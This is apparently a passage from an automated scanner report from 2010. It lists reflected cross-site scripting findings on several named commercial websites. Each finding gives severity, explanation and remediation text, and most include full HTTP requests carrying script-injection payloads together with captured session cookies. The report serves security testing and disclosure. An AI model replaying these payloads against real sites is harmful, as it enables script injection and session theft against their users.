The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a095"><script>alert(1)</script>9fb41edefe9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pro2a095"><script>alert(1)</script>9fb41edefe9/fb-follow/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Fri, 26 Nov 2010 20:33:32 GMT Content-Length: 18667 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjEyO30%3D; path=/; domain=.oodle.com
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5aa1d"-alert(1)-"f251f51b74e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pro/fb-follow5aa1d"-alert(1)-"f251f51b74e/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Fri, 26 Nov 2010 20:33:35 GMT Content-Length: 12342 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjE1O30%3D; path=/; domain=.oodle.com
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c9aa"><script>alert(1)</script>f8d17b7843f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pro/fb-follow1c9aa"><script>alert(1)</script>f8d17b7843f/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Fri, 26 Nov 2010 20:33:34 GMT Content-Length: 12401 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjEzO30%3D; path=/; domain=.oodle.com
1.250. http://www.oodle.com/pro/fb-follow/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/pro/fb-follow/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ed8e"-alert(1)-"545a0086820 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pro/fb-follow/?3ed8e"-alert(1)-"545a0086820=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Fri, 26 Nov 2010 20:33:32 GMT Content-Length: 10025 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjEyO30%3D; path=/; domain=.oodle.com
1.251. http://www.oodle.com/pro/fb-follow/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/pro/fb-follow/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 335f8"><script>alert(1)</script>b6b7ff9456b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pro/fb-follow/?335f8"><script>alert(1)</script>b6b7ff9456b=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Fri, 26 Nov 2010 20:33:26 GMT Content-Length: 10105 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjA2O30%3D; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4ae7"-alert(1)-"7616b8adb5d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /prod4ae7"-alert(1)-"7616b8adb5d/register/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Fri, 26 Nov 2010 20:33:26 GMT Content-Length: 18589 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjA2O30%3D; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f11c"><script>alert(1)</script>b9d58303a91 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pro1f11c"><script>alert(1)</script>b9d58303a91/register/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Fri, 26 Nov 2010 20:33:25 GMT Content-Length: 18681 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjA1O30%3D; path=/; domain=.oodle.com
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 356cd"-alert(1)-"b9eeacb18a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pro/register356cd"-alert(1)-"b9eeacb18a4/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Fri, 26 Nov 2010 20:33:27 GMT Content-Length: 12339 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjA3O30%3D; path=/; domain=.oodle.com
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1776e"><script>alert(1)</script>c9260d89932 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pro/register1776e"><script>alert(1)</script>c9260d89932/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Fri, 26 Nov 2010 20:33:26 GMT Content-Length: 12398 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjA1O30%3D; path=/; domain=.oodle.com
1.256. http://www.overstock.com/Home-Garden/Franklin-Brown-Tufted-Bonded-Leather-Club-Chair/5036238/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc878"style%3d"x%3aexpression(alert(1))"de327d4d908 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dc878"style="x:expression(alert(1))"de327d4d908 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Franklin-Brown-Tufted-Bonded-Leather-Club-Chair/5036238/product.html?dc878"style%3d"x%3aexpression(alert(1))"de327d4d908=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=4; mxcgotoast=; mxclastvisit=20101126; ostk_affiliate=; ostk_aggr_year=mxcuserseed^7936922902870390784|csbtmst^|csbcrt^|csbsfl^|mxcskupage^90|pageresult^90|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0; ostk_campaign=; mxccamid=; clubogiftcards=clubogctotal^0.00; mxcoriginal=; SSLB=B; cinfo=ccnt^0:ctmst^1290802672921; se_list=se_list^0|4|;
1.257. http://www.overstock.com/Home-Garden/Mission-Brown-Tufted-Bonded-Leather-Storage-Ottoman-Bench/5036236/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ac39"style%3d"x%3aexpression(alert(1))"b1de9c0f865 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ac39"style="x:expression(alert(1))"b1de9c0f865 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Mission-Brown-Tufted-Bonded-Leather-Storage-Ottoman-Bench/5036236/product.html?5ac39"style%3d"x%3aexpression(alert(1))"b1de9c0f865=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=4; mxcgotoast=; mxclastvisit=20101126; ostk_affiliate=; ostk_aggr_year=mxcuserseed^7936922902870390784|csbtmst^|csbcrt^|csbsfl^|mxcskupage^90|pageresult^90|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0; ostk_campaign=; mxccamid=; clubogiftcards=clubogctotal^0.00; mxcoriginal=; SSLB=B; cinfo=ccnt^0:ctmst^1290802672921; se_list=se_list^0|4|;
1.258. http://www.overstock.com/Home-Garden/Nottingham-Brown-Bonded-Leather-Folding-Storage-Ottoman/4783826/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd49a"style%3d"x%3aexpression(alert(1))"b5b8b6cc345 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bd49a"style="x:expression(alert(1))"b5b8b6cc345 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Nottingham-Brown-Bonded-Leather-Folding-Storage-Ottoman/4783826/product.html?bd49a"style%3d"x%3aexpression(alert(1))"b5b8b6cc345=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=4; mxcgotoast=; mxclastvisit=20101126; ostk_affiliate=; ostk_aggr_year=mxcuserseed^7936922902870390784|csbtmst^|csbcrt^|csbsfl^|mxcskupage^90|pageresult^90|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0; ostk_campaign=; mxccamid=; clubogiftcards=clubogctotal^0.00; mxcoriginal=; SSLB=B; cinfo=ccnt^0:ctmst^1290802672921; se_list=se_list^0|4|;
1.259. http://www.pressdisplay.com/pressdisplay/helpandsupport.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pressdisplay.com
Path:
/pressdisplay/helpandsupport.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35caa"style%3d"x%3aexpression(alert(1))"57642043def was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 35caa"style="x:expression(alert(1))"57642043def in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pressdisplay/helpandsupport.aspx?subpage=PressdisplaySystemRequirements&35caa"style%3d"x%3aexpression(alert(1))"57642043def=1 HTTP/1.1 Host: www.pressdisplay.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: public, max-age=86400 Content-Type: text/html; charset=utf-8 Expires: Sat, 27 Nov 2010 20:23:34 GMT Last-Modified: Fri, 26 Nov 2010 20:23:34 GMT Vary: Host Server: Microsoft-IIS/7.5 Set-Cookie: AProfile=56blCStE6bo+sGFMqnkh+mgqkKM=; expires=Mon, 26-Nov-2040 20:23:34 GMT; path=/pressdisplay/ X-AspNet-Version: 4.0.30319 wc: 1 Date: Fri, 26 Nov 2010 20:23:33 GMT Connection: close Content-Length: 13319
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head><meta http-equiv="content-type" content="text/html;charset=UTF-8"><script type="text/javascript"> window.NDScriptsVers ...[SNIP]... <a title="Overview" href="/pressdisplay/helpandsupport.aspx?subpage=PressdisplayOverview&35caa"style="x:expression(alert(1))"57642043def=1"> ...[SNIP]...
1.260. http://www.rentalhomesplus.com/search/oasis.dll [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.rentalhomesplus.com
Path:
/search/oasis.dll
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74bce"><a>2fdbf8c8381 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /search/oasis.dll?page=summarybz&property=311374.7&p=oodle&partner=oodle&74bce"><a>2fdbf8c8381=1 HTTP/1.1 Host: www.rentalhomesplus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.261. http://www.rentalhomesplus.com/search/oasis.dll [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.rentalhomesplus.com
Path:
/search/oasis.dll
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ea6b"%3bcd3001d760d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8ea6b";cd3001d760d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/oasis.dll?page=summarybz&property=311374.7&p=oodle&partner=oodle&8ea6b"%3bcd3001d760d=1 HTTP/1.1 Host: www.rentalhomesplus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the partner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fe3b"><a>180a3258f33 was submitted in the partner parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
